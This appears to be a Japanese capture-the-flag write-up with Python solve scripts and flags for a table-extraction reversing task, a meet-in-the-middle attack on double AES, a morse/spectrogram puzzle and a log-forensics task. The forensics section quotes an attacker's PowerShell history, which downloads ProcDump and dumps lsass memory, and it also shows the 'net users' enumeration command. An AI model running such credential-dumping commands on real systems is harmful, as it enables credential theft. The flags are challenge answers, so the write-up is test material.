int8_t[4] "0xaf" [298] 001044cc 30 78 37 30 int8_t[4] "0x70" [299] 001044d0 30 78 34 31 int8_t[4] "0x41" [300] 001044d4 30 78 63 64 int8_t[4] "0xcd" [301] 001044d8 30 78 37 65 int8_t[4] "0x7e" [302] 001044dc 30 78 34 34 int8_t[4] "0x44" [303] 001044e0 30 78 66 35 int8_t[4] "0xf5" [304] 001044e4 30 78 30 39 int8_t[4] "0x09" [305] 001044e8 30 78 33 32 int8_t[4] "0x32" [306] 001044ec 30 78 61 64 int8_t[4] "0xad" [307] 001044f0 30 78 62 33 int8_t[4] "0xb3" [308] 001044f4 30 78 39 37 int8_t[4] "0x97" [309] 001044f8 30 
78 63 65 int8_t[4] "0xce" [310] 001044fc 30 78 36 38 int8_t[4] "0x68" [311] 00104500 30 78 66 63 int8_t[4] "0xfc" [312] 00104504 30 78 33 62 int8_t[4] "0x3b" [313] 00104508 30 78 65 39 int8_t[4] "0xe9" [314] 0010450c 30 78 33 36 int8_t[4] "0x36" [315] 00104510 30 78 32 62 int8_t[4] "0x2b" [316] 00104514 30 78 65 61 int8_t[4] "0xea" [317] 00104518 30 78 39 33 int8_t[4] "0x93" [318] 0010451c 30 78 39 30 int8_t[4] "0x90" [319] 00104520 30 78 33 66 int8_t[4] "0x3f" [320] 00104524 30 78 30 62 int8_t[4] "0x0b" [321] 00104528 30 78 64 35 int8_t[4] "0xd5" [322] 0010452c 30 78 65 30 int8_t[4] "0xe0" [323] 00104530 30 78 36 33 int8_t[4] "0x63" [324] 00104534 30 78 36 31 int8_t[4] "0x61" [325] 00104538 30 78 36 62 int8_t[4] "0x6b" [326] 0010453c 30 78 39 66 int8_t[4] "0x9f" [327] 00104540 30 78 37 39 int8_t[4] "0x79" [328] 00104544 30 78 34 38 int8_t[4] "0x48" [329] 00104548 30 78 34 33 int8_t[4] "0x43" [330] 0010454c 30 78 36 38 int8_t[4] "0x68" [331] 00104550 30 78 33 32 int8_t[4] "0x32" [332] 00104554 30 78 33 31 int8_t[4] "0x31" [333] 00104558 30 78 30 32 int8_t[4] "0x02" [334] 0010455c 30 78 63 31 int8_t[4] "0xc1" [335] 00104560 30 78 66 34 int8_t[4] "0xf4" [336] 00104564 30 78 33 39 int8_t[4] "0x39" [337] 00104568 30 78 65 63 int8_t[4] "0xec" [338] 0010456c 30 78 33 62 int8_t[4] "0x3b" [339] 00104570 30 78 30 63 int8_t[4] "0x0c" [340] 00104574 30 78 64 65 int8_t[4] "0xde" [341] 00104578 30 78 36 31 int8_t[4] "0x61" [342] 0010457c 30 78 30 38 int8_t[4] "0x08" [343] 00104580 30 78 61 36 int8_t[4] "0xa6" [344] 00104584 30 78 33 61 int8_t[4] "0x3a" [345] 00104588 30 78 38 38 int8_t[4] "0x88" [346] 0010458c 30 78 62 36 int8_t[4] "0xb6" [347] 00104590 30 78 30 38 int8_t[4] "0x08" [348] 00104594 30 78 62 39 int8_t[4] "0xb9" [349] 00104598 30 78 34 39 int8_t[4] "0x49" [350] 0010459c 30 78 36 35 int8_t[4] "0x65" [351] 001045a0 30 78 30 64 int8_t[4] "0x0d" [352] 001045a4 30 78 39 32 int8_t[4] "0x92" [353] 001045a8 30 78 37 65 int8_t[4] "0x7e" [354] 001045ac 30 78 32 31 int8_t[4] 
"0x21" [355] 001045b0 30 78 31 34 int8_t[4] "0x14" [356] 001045b4 30 78 31 37 int8_t[4] "0x17" [357] 001045b8 30 78 65 62 int8_t[4] "0xeb" [358] 001045bc 30 78 65 33 int8_t[4] "0xe3" [359] 001045c0 30 78 36 32 int8_t[4] "0x62" [360] 001045c4 30 78 65 61 int8_t[4] "0xea" [361] 001045c8 30 78 66 62 int8_t[4] "0xfb" [362] 001045cc 30 78 37 66 int8_t[4] "0x7f" [363] 001045d0 30 78 30 65 int8_t[4] "0x0e" [364] 001045d4 30 78 38 33 int8_t[4] "0x83" [365] 001045d8 30 78 32 31 int8_t[4] "0x21" [366] 001045dc 30 78 66 36 int8_t[4] "0xf6" [367] 001045e0 30 78 31 64 int8_t[4] "0x1d" [368] 001045e4 30 78 36 35 int8_t[4] "0x65" [369] 001045e8 30 78 63 63 int8_t[4] "0xcc" [370] 001045ec 30 78 34 64 int8_t[4] "0x4d" [371] 001045f0 30 78 35 31 int8_t[4] "0x51" [372] 001045f4 30 78 39 37 int8_t[4] "0x97" [373] 001045f8 30 78 30 31 int8_t[4] "0x01" [374] 001045fc 30 78 30 36 int8_t[4] "0x06" [375] 00104600 30 78 62 33 int8_t[4] "0xb3" [376] 00104604 30 78 37 64 int8_t[4] "0x7d" [377] 00104608 30 78 36 34 int8_t[4] "0x64" [378] 0010460c 30 78 37 62 int8_t[4] "0x7b" [379] 00104610 30 78 35 39 int8_t[4] "0x59" [380] 00104614 30 78 33 30 int8_t[4] "0x30" [381] 00104618 30 78 64 62 int8_t[4] "0xdb" [382] 0010461c 30 78 30 35 int8_t[4] "0x05" [383] 00104620 30 78 33 31 int8_t[4] "0x31" [384] 00104624 30 78 64 65 int8_t[4] "0xde" [385] 00104628 30 78 35 39 int8_t[4] "0x59" [386] 0010462c 30 78 33 34 int8_t[4] "0x34" [387] 00104630 30 78 31 35 int8_t[4] "0x15" [388] 00104634 30 78 65 36 int8_t[4] "0xe6" [389] 00104638 30 78 32 37 int8_t[4] "0x27" [390] 0010463c 30 78 64 66 int8_t[4] "0xdf" [391] 00104640 30 78 39 30 int8_t[4] "0x90" [392] 00104644 30 78 31 38 int8_t[4] "0x18" [393] 00104648 30 78 35 65 int8_t[4] "0x5e" [394] 0010464c 30 78 33 62 int8_t[4] "0x3b" [395] 00104650 30 78 37 64 int8_t[4] "0x7d" [396] 00104654 30 78 38 33 int8_t[4] "0x83" [397] 00104658 30 78 34 33 int8_t[4] "0x43" [398] 0010465c 30 78 65 38 int8_t[4] "0xe8" [399] 00104660 30 78 37 38 int8_t[4] "0x78" [400] 
00104664 30 78 32 64 int8_t[4] "0x2d" [401] 00104668 30 78 32 64 int8_t[4] "0x2d" [402] 0010466c 30 78 30 63 int8_t[4] "0x0c" [403] 00104670 30 78 35 33 int8_t[4] "0x53" [404] 00104674 30 78 38 37 int8_t[4] "0x87" [405] 00104678 30 78 64 31 int8_t[4] "0xd1" [406] 0010467c 30 78 61 32 int8_t[4] "0xa2" [407] 00104680 30 78 33 34 int8_t[4] "0x34" [408] 00104684 30 78 32 61 int8_t[4] "0x2a" [409] 00104688 30 78 31 34 int8_t[4] "0x14" [410] 0010468c 30 78 66 61 int8_t[4] "0xfa" [411] 00104690 30 78 62 33 int8_t[4] "0xb3" [412] 00104694 30 78 34 37 int8_t[4] "0x47" [413] 00104698 30 78 64 31 int8_t[4] "0xd1" [414] 0010469c 30 78 31 39 int8_t[4] "0x19" [415] 001046a0 30 78 38 37 int8_t[4] "0x87" [416] 001046a4 30 78 62 34 int8_t[4] "0xb4" [417] 001046a8 30 78 37 66 int8_t[4] "0x7f" [418] 001046ac 30 78 62 38 int8_t[4] "0xb8" [419] 001046b0 30 78 65 33 int8_t[4] "0xe3" [420] 001046b4 30 78 63 34 int8_t[4] "0xc4" [421] 001046b8 30 78 66 31 int8_t[4] "0xf1" [422] 001046bc 30 78 62 35 int8_t[4] "0xb5" [423] 001046c0 30 78 39 34 int8_t[4] "0x94" [424] 001046c4 30 78 38 62 int8_t[4] "0x8b" [425] 001046c8 30 78 61 61 int8_t[4] "0xaa" [426] 001046cc 30 78 35 39 int8_t[4] "0x59" [427] 001046d0 30 78 38 35 int8_t[4] "0x85" [428] 001046d4 30 78 61 33 int8_t[4] "0xa3" [429] 001046d8 30 78 30 34 int8_t[4] "0x04" [430] 001046dc 30 78 37 61 int8_t[4] "0x7a" [431] 001046e0 30 78 36 31 int8_t[4] "0x61" [432] 001046e4 30 78 65 35 int8_t[4] "0xe5" [433] 001046e8 30 78 38 36 int8_t[4] "0x86" [434] 001046ec 30 78 65 37 int8_t[4] "0xe7" [435] 001046f0 30 78 34 31 int8_t[4] "0x41" [436] 001046f4 30 78 36 35 int8_t[4] "0x65" [437] 001046f8 30 78 33 30 int8_t[4] "0x30" [438] 001046fc 30 78 65 63 int8_t[4] "0xec" [439] 00104700 30 78 34 66 int8_t[4] "0x4f" [440] 00104704 30 78 36 31 int8_t[4] "0x61" [441] 00104708 30 78 38 36 int8_t[4] "0x86" [442] 0010470c 30 78 34 63 int8_t[4] "0x4c" [443] 00104710 30 78 32 66 int8_t[4] "0x2f" [444] 00104714 30 78 35 61 int8_t[4] "0x5a" [445] 00104718 30 78 30 
62 int8_t[4] "0x0b" [446] 0010471c 30 78 34 32 int8_t[4] "0x42" [447] 00104720 30 78 37 36 int8_t[4] "0x76" [448] 00104724 30 78 32 30 int8_t[4] "0x20" [449]
validatorは入力のi文字目をverify[i * 9]と比較しているので、verifyからインデックスが9の倍数の要素だけを抽出して結合すればフラグになる。フラグ形式の終端である'}'まで読めばよい。
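#!/usr/bin/env python3
"""Extract the combination flag from the `verify` table.

validator() compares input[i] against verify[i * 9], so the flag is simply every
9th entry of the table, read until the closing '}' of the flag format. The table is
laid out 9 values per row below, so the first column reads as the flag.
"""

verify = [
    0x43, 0xf1, 0x25, 0x0b, 0xac, 0xa2, 0x2e, 0xb6, 0xb2,
    0x54, 0x3a, 0x7d, 0x4f, 0x6e, 0x1d, 0x2e, 0x7e, 0xd1,
    0x46, 0x8a, 0x08, 0xa3, 0x60, 0x97, 0x33, 0x8b, 0x1a,
    0x7b, 0xb7, 0x8c, 0x4a, 0x82, 0x2f, 0x9b, 0xb1, 0x44,
    0x66, 0xc9, 0x51, 0xd3, 0x9c, 0x4b, 0x69, 0xde, 0x0c,
    0x65, 0x05, 0x6a, 0x4f, 0x37, 0x17, 0x00, 0x67, 0x23,
    0x34, 0x11, 0xf0, 0x6d, 0x65, 0x81, 0x40, 0xc8, 0xc9,
    0x30, 0xa7, 0xd3, 0x4e, 0xc5, 0xc0, 0x0d, 0x2f, 0x97,
    0x32, 0x5f, 0x1b, 0xbe, 0x25, 0x1a, 0x26, 0x58, 0x05,
    0x31, 0xa8, 0x29, 0x09, 0x9e, 0xf6, 0xb6, 0xbc, 0x68,
    0x38, 0xf5, 0xc4, 0x36, 0x81, 0x29, 0xdc, 0x65, 0x44,
    0x33, 0x8e, 0x31, 0x89, 0x6d, 0x22, 0xda, 0x92, 0x87,
    0x65, 0x57, 0xe2, 0x10, 0x58, 0x35, 0x2e, 0x65, 0xc8,
    0x61, 0xc5, 0x10, 0x20, 0x6f, 0x45, 0x80, 0x2a, 0xc5,
    0x33, 0x42, 0xcc, 0xd8, 0xf3, 0xc0, 0x59, 0xfb, 0x7a,
    0x30, 0x3c, 0xed, 0xef, 0xdf, 0x02, 0xb2, 0x21, 0x1a,
    0x34, 0x4c, 0xfb, 0x52, 0x02, 0x2f, 0x4a, 0xd3, 0x8a,
    0x31, 0xab, 0xf3, 0x1b, 0x0a, 0x57, 0xcc, 0x7e, 0xec,
    0x37, 0x5c, 0xa2, 0xe9, 0x6b, 0xbb, 0x47, 0x49, 0x55,
    0x66, 0xef, 0x04, 0x39, 0xde, 0x15, 0xc3, 0xf0, 0x97,
    0x35, 0xfd, 0x47, 0x28, 0xcd, 0x33, 0x38, 0x2a, 0x8e,
    0x64, 0x29, 0xa3, 0x91, 0xf6, 0x9e, 0xd6, 0xee, 0x86,
    0x33, 0xb4, 0xbd, 0x5b, 0xa7, 0x6b, 0xfd, 0xfd, 0x02,
    0x33, 0x44, 0xfd, 0x1f, 0x5d, 0x4b, 0xe2, 0x9c, 0x1f,
    0x33, 0x2e, 0x91, 0xf5, 0x83, 0xe6, 0x97, 0xad, 0x0b,
    0x62, 0x19, 0x58, 0xb4, 0x65, 0xc6, 0x8c, 0xcc, 0x84,
    0x34, 0x63, 0xcd, 0xcc, 0xd3, 0xdf, 0xec, 0x6a, 0xfa,
    0x30, 0x53, 0x29, 0x4e, 0x97, 0x1d, 0x53, 0x6f, 0x61,
    0x63, 0xd5, 0x6a, 0x1a, 0x1d, 0xdf, 0xea, 0x58, 0xcf,
    0x32, 0x2e, 0x86, 0x7b, 0x99, 0x2b, 0x94, 0x78, 0xf4,
    0x32, 0xce, 0x15, 0x36, 0x96, 0x93, 0x54, 0x33, 0xa5,
    0x64, 0x5d, 0xe2, 0x47, 0x8d, 0x69, 0xa0, 0xf8, 0xe9,
    0x39, 0xbb, 0x01, 0xdb, 0x1e, 0xd7, 0x8a, 0x5c, 0xba,
    0x62, 0xaf, 0x70, 0x41, 0xcd, 0x7e, 0x44, 0xf5, 0x09,
    0x32, 0xad, 0xb3, 0x97, 0xce, 0x68, 0xfc, 0x3b, 0xe9,
    0x36, 0x2b, 0xea, 0x93, 0x90, 0x3f, 0x0b, 0xd5, 0xe0,
    0x63, 0x61, 0x6b, 0x9f, 0x79, 0x48, 0x43, 0x68, 0x32,
    0x31, 0x02, 0xc1, 0xf4, 0x39, 0xec, 0x3b, 0x0c, 0xde,
    0x61, 0x08, 0xa6, 0x3a, 0x88, 0xb6, 0x08, 0xb9, 0x49,
    0x65, 0x0d, 0x92, 0x7e, 0x21, 0x14, 0x17, 0xeb, 0xe3,
    0x62, 0xea, 0xfb, 0x7f, 0x0e, 0x83, 0x21, 0xf6, 0x1d,
    0x65, 0xcc, 0x4d, 0x51, 0x97, 0x01, 0x06, 0xb3, 0x7d,
    0x64, 0x7b, 0x59, 0x30, 0xdb, 0x05, 0x31, 0xde, 0x59,
    0x34, 0x15, 0xe6, 0x27, 0xdf, 0x90, 0x18, 0x5e, 0x3b,
    0x7d, 0x83, 0x43, 0xe8, 0x78, 0x2d, 0x2d, 0x0c, 0x53,
    0x87, 0xd1, 0xa2, 0x34, 0x2a, 0x14, 0xfa, 0xb3, 0x47,
    0xd1, 0x19, 0x87, 0xb4, 0x7f, 0xb8, 0xe3, 0xc4, 0xf1,
    0xb5, 0x94, 0x8b, 0xaa, 0x59, 0x85, 0xa3, 0x04, 0x7a,
    0x61, 0xe5, 0x86, 0xe7, 0x41, 0x65, 0x30, 0xec, 0x4f,
    0x61, 0x86, 0x4c, 0x2f, 0x5a, 0x0b, 0x42, 0x76, 0x20,
]


def extract_flag(table, stride=9, terminator='}'):
    """Return chr(table[0]), chr(table[stride]), ... joined, stopping after *terminator*.

    If *terminator* never occurs, every stride-th entry is returned (same as the
    original loop); an empty table yields ''.
    """
    chars = []
    for i in range(0, len(table), stride):
        chars.append(chr(table[i]))
        if chars[-1] == terminator:
            break
    return ''.join(chars)


flag = extract_flag(verify)
print(flag)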
CTF{fe402183ea30417f5d333b40c22d9b26c1aebed4}
log-forensics (Forensics)
ディスク上のファイルやシステム情報と一部のログ情報があるので、5つの質問に答える。
1問目は「ターゲットシステム上のlsassプロセスをダンプするために使用される完全なコマンドは何か」という問題。
PhysicalDrive0_0\PowerShellHistory\Users\bitsentinel\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
を見ると、終わりの方に以下のように書いてある。
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip"-OutFile "$env:TEMP\procdump.zip" Expand-Archive "C:\Users\BITSEN~1\AppData\Local\Temp\procdump.zip" $env:TEMP\Procdump -Force C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump.exe -aacepteula -ma lsass.exe passwords.txt ls C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump.exe -aacepteula -ma lsass.exe passwords C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump.exe -aacepteula -ma lsass.exe psexec.exe -s -d -i lsass.exe C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump64.exe -s -d -i lsass.exe C:\Users\BITSEN~1\AppData\Local\Temp\Procdump\procdump64.exe -ma lsass.exe lsass.txt
procdump64.exe -ma lsass.exe lsass.txt
2問目は「侵害されたコンピュータのIPアドレスは何か」という問題。
PhysicalDrive0_0\Config\Windows\System32\config\SYSTEMをRegistry Viewerで開く。SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfacesの下に、2つインタフェースがある。IPアドレスが設定されているのは片方だけで、IPAddressに以下が設定されている。
10.0.8.16
3問目は「すべてのシステムユーザーを列挙するために攻撃者が使用するコマンドは何か」という問題。
すべてのシステムユーザを列挙するコマンドについても、以下のファイルを見れば書いてある。
PhysicalDrive0_0\PowerShellHistory\Users\bitsentinel\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net users
4問目は「OSパスワードがダンプされた場合、どのMITRE テクニックを割り当てることができるか」という問題。
フラグ形式は「テクニックID:テクニック名」（例: T1003:OS Credential Dumping）である。
MITRE ATT&CKを調べればよい。
T1003:OS Credential Dumping
5問目は「攻撃者が侵害されたシステム上の既存のローカルグループを列挙しようとしたときにトリガーされたWindowsセキュリティイベントコードは何か」という問題。
ローカルグループのメンバーシップが列挙されたときに記録されるWindowsセキュリティイベントIDを調べればよい（イベントID 4798: A user's local group membership was enumerated）。
4798
4aes (Cryptography)
2つの鍵はそれぞれ先頭3バイトだけが未知（残り29バイトは'A'）なので、鍵空間は各2^24通り。鍵の組を総当たりすると2^48通りになるが、AES_k2(AES_k1(plain)) = ct ⇔ AES_k1(plain) = AES_k2^-1(ct) なので、plainを全k1で暗号化した結果をテーブルに入れ、ct = b'7\xcf7\xce\xa6 \xbe\t\xba\x03\xe4\xac\x9e\x86\x85\xf5YZYa_7\xae\xa1\xe6\xc1\xd1\xad\xfb\x9c\x99s' を全k2で復号した結果と一致する組を探す中間一致攻撃（meet-in-the-middle）なら約2·2^24回のAES演算で済む（弱い鍵を2段重ねても強度は足し算にならない、2DESと同じ構図）。あとはその鍵の組を使ってフラグを生成する。
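#!/usr/bin/env python3
"""Meet-in-the-middle attack on 4aes.

Both AES-256 keys have only 3 unknown leading bytes (the remaining 29 are 'A'), so
each key space is 2^24. Brute-forcing the pair would be 2^48, but since
    AES_k2(AES_k1(pt)) == ct   <=>   AES_k1(pt) == AES_k2^-1(ct)
we tabulate the 2^24 forward encryptions once and look each of the 2^24 backward
decryptions up in O(1): about 2 * 2^24 AES operations in total. Two weak keys do not
add up to one strong key — the same reason double-DES is not 112-bit secure.
"""
import hashlib

from Crypto.Cipher import AES

KEY_SPACE = 256 ** 3      # 3 unknown key bytes
KEY_SUFFIX = b'A' * 29    # fixed tail of every candidate key

try_pt = b'This is a non-secret message....'
try_ct = b'7\xcf7\xce\xa6 \xbe\t\xba\x03\xe4\xac\x9e\x86\x85\xf5YZYa_7\xae\xa1\xe6\xc1\xd1\xad\xfb\x9c\x99s'


def make_key(i):
    """Build the 32-byte candidate key for index *i*: big-endian 3-byte prefix + 29 'A'."""
    return i.to_bytes(3, 'big') + KEY_SUFFIX


def find_keys(pt, ct, key_space=KEY_SPACE):
    """Return (k1, k2) such that AES-ECB_k2(AES-ECB_k1(pt)) == ct.

    Raises ValueError when no pair exists in the search space (the original script
    would instead fail with a NameError on the undefined k2).
    """
    # dict instead of list: O(1) membership/lookup rather than `in` + index() on a
    # 16M-entry list, which made the second loop quadratic.
    forward = {}
    for i in range(key_space):
        forward[AES.new(make_key(i), AES.MODE_ECB).encrypt(pt)] = i
    for j in range(key_space):
        k2 = make_key(j)
        mid = AES.new(k2, AES.MODE_ECB).decrypt(ct)
        i = forward.get(mid)
        if i is not None:
            return make_key(i), k2
    raise ValueError('no key pair found in the search space')


k1, k2 = find_keys(try_pt, try_ct)
sha256 = hashlib.sha256(k1 + k2).hexdigest()
print("CTF{" + sha256 + "}")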
CTF{91e6611654e4fe66d6876f728b8dfd54999ed752f89239ab82ecd9e520c1e003}
morse-music (Steganography, Cryptography)
wavファイルにあるモールス信号をhttps://morsecode.world/international/decoder/audio-decoder-adaptive.htmlでデコードする。
DID YOU KNOW THAT THIS IS NOT ABOUT THE MORSE CODE? IT IS ABOUT THE SPECTROGRAM ONLY THAT THE PASSWORD IS UHR3V8203RJD
Audacityで開き、スペクトログラムを確認する。サンプル周波数を調整すると、QRコードが見えた。
QRコードを読み取ると、以下のデータを取得できた。
Njw0SGcLVwJVZ358MC0xBmUMClMKanlzZSpnAjVeBgVRMX0lYyliA2RaB1UDY3ghMHw0UGUPAQAHNysnNClmAjMPA1VO
このデータをbase64デコードしたものとモールス信号のデコードで取得したパスワードをXORする。
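#!/usr/bin/env python3
"""Recover the morse-music flag.

The QR code yields a base64 payload; XOR it with the password read from the morse
audio, repeated cyclically (plain repeating-key XOR).
"""
from base64 import *


def xor_repeating(data, key):
    """XOR *data* with *key* repeated cyclically and return the result as bytes.

    Raises ValueError on an empty key (the original loop would divide by zero).
    """
    if not key:
        raise ValueError('key must not be empty')
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


password = b'UHR3V8203RJD'
ct = 'Njw0SGcLVwJVZ358MC0xBmUMClMKanlzZSpnAjVeBgVRMX0lYyliA2RaB1UDY3ghMHw0UGUPAQAHNysnNClmAjMPA1VO'
ct = b64decode(ct)
# latin-1 maps every byte to the same code point, matching the original chr() loop.
flag = xor_repeating(ct, password).decode('latin-1')
print(flag)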
ctf{13e2f548eec5348c98370b51cf45bc7a6a002b5e012ee4fc37304eacaa41e71e}